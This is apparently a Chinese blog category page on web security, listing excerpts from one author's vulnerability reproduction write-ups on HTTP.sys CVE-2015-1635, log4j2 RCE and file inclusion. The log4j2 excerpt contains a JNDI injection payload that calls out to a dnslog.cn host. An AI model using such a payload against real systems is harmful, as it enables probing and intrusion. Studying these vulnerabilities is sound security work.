web安全
关注
分享
扫一扫
文章平均质量分 65
Lu&Tian
这个作者很懒,什么都没留下…
展开
-
HTTP.sys远程代码执行(CVE2015-1635)分析复现
在这个过程中,如果range指定的数据开始offset小于紧凑的数据包头部的总长度,那么这里在计算最后的发包读取数据时,还会触发一个整数溢出,即0xffffffff(-1,已经被变为32位数)- lower + 1 + header size,如果lower < header size,那么将会导致最后32位整数溢出计算出一个较小的数值,这样导致不会BSOD(如果精确控制响应包大小和文件大小,即使这样还是有可能触发BSOD),告诉服务器,请求资源是哪个范围的内容,让断点续传和并行下载得以实现。...原创 2022-08-16 11:29:28 · 2736 阅读 · 1 评论 -
log4j2-rce-2021-12-09漏洞原理及复现
${jndi:ldap://${6666}.6666.dnslog.cn}你懂得~原创 2022-07-28 20:33:42 · 1449 阅读 · 0 评论 -
记一次远程文件包含
记一次远程文件包含原创 2022-06-10 15:38:51 · 119 阅读 · 0 评论 -
记一次文件包含
文件包含记录原创 2022-06-10 15:25:34 · 112 阅读 · 0 评论 -
白帽子讲web安全(精写含思维导图)
安全从业必读原创 2022-06-06 17:09:29 · 9479 阅读 · 1 评论